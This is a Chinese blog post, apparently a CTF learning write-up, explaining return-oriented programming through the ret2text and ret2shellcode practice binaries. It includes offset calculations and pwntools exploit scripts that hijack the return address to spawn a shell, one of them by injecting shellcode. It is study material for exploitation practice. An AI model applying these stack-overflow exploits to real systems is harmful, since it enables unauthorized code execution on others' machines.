<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon1.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon2.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="栈缓冲区溢出的基础上，利用程序中已有的小片段( gadgets )来改变某些寄存器或者变量的值，从而控制程序的执行流程 ——CTF Wiki">
<meta property="og:type" content="article">
<meta property="og:title" content="ROP">
<meta property="og:url" content="http://example.com/2021/03/11/ROP/index.html">
<meta property="og:site_name" content="HeHeのr">
<meta property="og:description" content="栈缓冲区溢出的基础上，利用程序中已有的小片段( gadgets )来改变某些寄存器或者变量的值，从而控制程序的执行流程 ——CTF Wiki">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img.imgdb.cn/item/6049c3645aedab222ceaecc7.png">
<meta property="og:image" content="https://img.imgdb.cn/item/6049c38e5aedab222ceb017b.jpg">
<meta property="og:image" content="https://img.imgdb.cn/item/6049c4b35aedab222ceb97a0.jpg">
<meta property="og:image" content="https://img.imgdb.cn/item/6049c9635aedab222cee3807.jpg">
<meta property="og:image" content="https://img.imgdb.cn/item/6049cd9c5aedab222cf0661b.jpg">
<meta property="og:image" content="https://img.imgdb.cn/item/6049eaf85aedab222c02b435.jpg">
<meta property="og:image" content="https://img.imgdb.cn/item/6049ead75aedab222c029b47.jpg">
<meta property="og:image" content="https://img.imgdb.cn/item/6049eb985aedab222c032ec6.jpg">
<meta property="og:image" content="https://img.imgdb.cn/item/6049ef925aedab222c06ccf9.jpg">
<meta property="og:image" content="https://img.imgdb.cn/item/6049f4dd5aedab222c0bf31e.jpg">
<meta property="article:published_time" content="2021-03-11T05:31:25.000Z">
<meta property="article:modified_time" content="2021-03-11T10:51:55.231Z">
<meta property="article:author" content="些子疏狂">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img.imgdb.cn/item/6049c3645aedab222ceaecc7.png">

<link rel="canonical" href="http://example.com/2021/03/11/ROP/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>ROP | HeHeのr</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>


</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">HeHeのr</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

  
  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  
    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/03/11/ROP/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar1.gif">
      <meta itemprop="name" content="些子疏狂">
      <meta itemprop="description" content="少年心事当拏云">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="HeHeのr">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ROP
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-03-11 13:31:25 / 修改时间：18:51:55" itemprop="dateCreated datePublished" datetime="2021-03-11T13:31:25+08:00">2021-03-11</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index"><span itemprop="name">pwn</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>栈缓冲区溢出的基础上，利用程序中已有的小片段( gadgets )来改变某些寄存器或者变量的值，从而控制程序的执行流程 ——CTF Wiki</p>
<a id="more"></a>
<p>一类随着NX保护开启，直接向栈上或堆上直接注入代码的方式难以继续发挥效果，而提出的通过以ret结尾的指令序列来改变某些地址的内容的攻击<br>ROP攻击核心在于利用了指令集中的ret指令，改变了指令流的执行顺序<br>ROP攻击一般满足：</p>
<pre><code>程序存在溢出，并且可以控制返回地址。
可以找到满足条件的gadgets以及相应gadgets的地址</code></pre>
<h1 id="ret2text"><a href="#ret2text" class="headerlink" title="ret2text"></a>ret2text</h1><h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>ret2text指控制程序本身就有的代码(.text)。</p>
<h2 id="例子"><a href="#例子" class="headerlink" title="例子"></a>例子</h2><p>使用提供的ret2text<br>checksec后果然发现仅仅开启了NX的栈不可执行保护<br><a target="_blank" rel="noopener" href="https://img.imgdb.cn/item/6049c3645aedab222ceaecc7.png"><img src="https://img.imgdb.cn/item/6049c3645aedab222ceaecc7.png"></a><br>然后ida反编译代码，可以看到gets存在栈溢出漏洞<br><a target="_blank" rel="noopener" href="https://img.imgdb.cn/item/6049c38e5aedab222ceb017b.jpg"><img src="https://img.imgdb.cn/item/6049c38e5aedab222ceb017b.jpg"></a><br>并且能够直接找到system(“/bin/sh”)的代码<br><a target="_blank" rel="noopener" href="https://img.imgdb.cn/item/6049c4b35aedab222ceb97a0.jpg"><img src="https://img.imgdb.cn/item/6049c4b35aedab222ceb97a0.jpg"></a><br>所以如果我们直接控制程序返回至 0x0804863A，那么就可以得到系统的 shell 了</p>
<p>那么接下来就是构造payload<br>为了能够将main函数的返回地址调整至我们想要的地址，首先需要确定我们能够控制的内存的起始地址距离main函数的返回地址的字节数<br><a target="_blank" rel="noopener" href="https://img.imgdb.cn/item/6049c9635aedab222cee3807.jpg"><img src="https://img.imgdb.cn/item/6049c9635aedab222cee3807.jpg"></a><br>可以看到s是相对于esp的索引，那么将断点下在call处查看esp,ebp<br><a target="_blank" rel="noopener" href="https://img.imgdb.cn/item/6049cd9c5aedab222cf0661b.jpg"><img src="https://img.imgdb.cn/item/6049cd9c5aedab222cf0661b.jpg"></a><br>可以看到esp为0xffffcfa0,ebp为0xffffcdc8,同时s相对于esp的索引也就是esp+0x1c即0xffffcfbc，那么就能算出s相对于ebp的偏移为0x6c，相对于返回地址的偏移为0x6c+4<br>得到exp</p>
<pre><code>from pwn import *
sh = process(&#39;./ret2text&#39;)
addr = 0x804863A
sh.sendline(&#39;A&#39; * (0x6c+4) + p32(addr))
sh.interactive()</code></pre>
<h1 id="ret2shell"><a href="#ret2shell" class="headerlink" title="ret2shell"></a>ret2shell</h1><h2 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h2><p>即控制程序执行shellcode代码。而shellcode指的是用于完成某个功能的汇编代码，常见的功能便是获取目标系统的shell。<br>一般来说，就是要填充上一些可执行的代码来获取权限，而要想执行就需要对应的binary在运行时，shellcode所在区域有可执行权限</p>
<h2 id="例子-1"><a href="#例子-1" class="headerlink" title="例子"></a>例子</h2><p>依旧提供了ret2shellcode进行学习<br>checksec看出几乎没有开启任何保护，有可读，可写，可执行段<br><a target="_blank" rel="noopener" href="https://img.imgdb.cn/item/6049eaf85aedab222c02b435.jpg"><img src="https://img.imgdb.cn/item/6049eaf85aedab222c02b435.jpg"></a><br>拖进ida查看反编译的代码<br><a target="_blank" rel="noopener" href="https://img.imgdb.cn/item/6049ead75aedab222c029b47.jpg"><img src="https://img.imgdb.cn/item/6049ead75aedab222c029b47.jpg"></a><br>看出程序是基本的栈溢出漏洞，值得注意的是会将对应的字符串复制到buf2处，同时能够得知buf2在bss段<br><a target="_blank" rel="noopener" href="https://img.imgdb.cn/item/6049eb985aedab222c032ec6.jpg"><img src="https://img.imgdb.cn/item/6049eb985aedab222c032ec6.jpg"></a><br>所以接下来需要通过调试程序来判断这个bss段是否可以执行<br>在main函数下断点，然后通过vmmap看bss段的权限<br><a target="_blank" rel="noopener" href="https://img.imgdb.cn/item/6049ef925aedab222c06ccf9.jpg"><img src="https://img.imgdb.cn/item/6049ef925aedab222c06ccf9.jpg"></a><br>可以从第3行看到,bss段的地址从0x804a000到0x804b000，权限是rwxp可以执行</p>
<p>所以这题就控制程序执行shellcode<br>即读入shellcode，然后控制程序执行bss段处的shellcode</p>
<p>同样在call处下断点，<br><a target="_blank" rel="noopener" href="https://img.imgdb.cn/item/6049f4dd5aedab222c0bf31e.jpg"><img src="https://img.imgdb.cn/item/6049f4dd5aedab222c0bf31e.jpg"></a><br>可以看到s相对于ebp的偏移为0xffffd028-0xffffcfbc,那么相对于返回地址的偏移量就是112<br>所以可以得到如下的exp</p>
<pre><code>from pwn import *

sh = process(&#39;./ret2shellcode&#39;)
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804A080

sh.sendline(shellcode.ljust(112, &#39;a&#39;) + p32(buf2_addr))
sh.interactive()</code></pre>
<p>这样就能通过执行buf2上的shellcode来获取shell</p>
<h1 id="retsyscall"><a href="#retsyscall" class="headerlink" title="retsyscall"></a>retsyscall</h1>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/03/08/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2/" rel="prev" title="格式化字符串">
      <i class="fa fa-chevron-left"></i> 格式化字符串
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#ret2text"><span class="nav-text">ret2text</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8E%9F%E7%90%86"><span class="nav-text">原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BE%8B%E5%AD%90"><span class="nav-text">例子</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ret2shell"><span class="nav-text">ret2shell</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8E%9F%E7%90%86-1"><span class="nav-text">原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BE%8B%E5%AD%90-1"><span class="nav-text">例子</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#retsyscall"><span class="nav-text">retsyscall</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="些子疏狂"
      src="/images/avatar1.gif">
  <p class="site-author-name" itemprop="name">些子疏狂</p>
  <div class="site-description" itemprop="description">少年心事当拏云</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">7</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/newfish-cmyk" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;newfish-cmyk" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:1239331448@qq.com" title="E-Mail → mailto:1239331448@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">些子疏狂</span>
</div>
  <div class="powered-by">
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
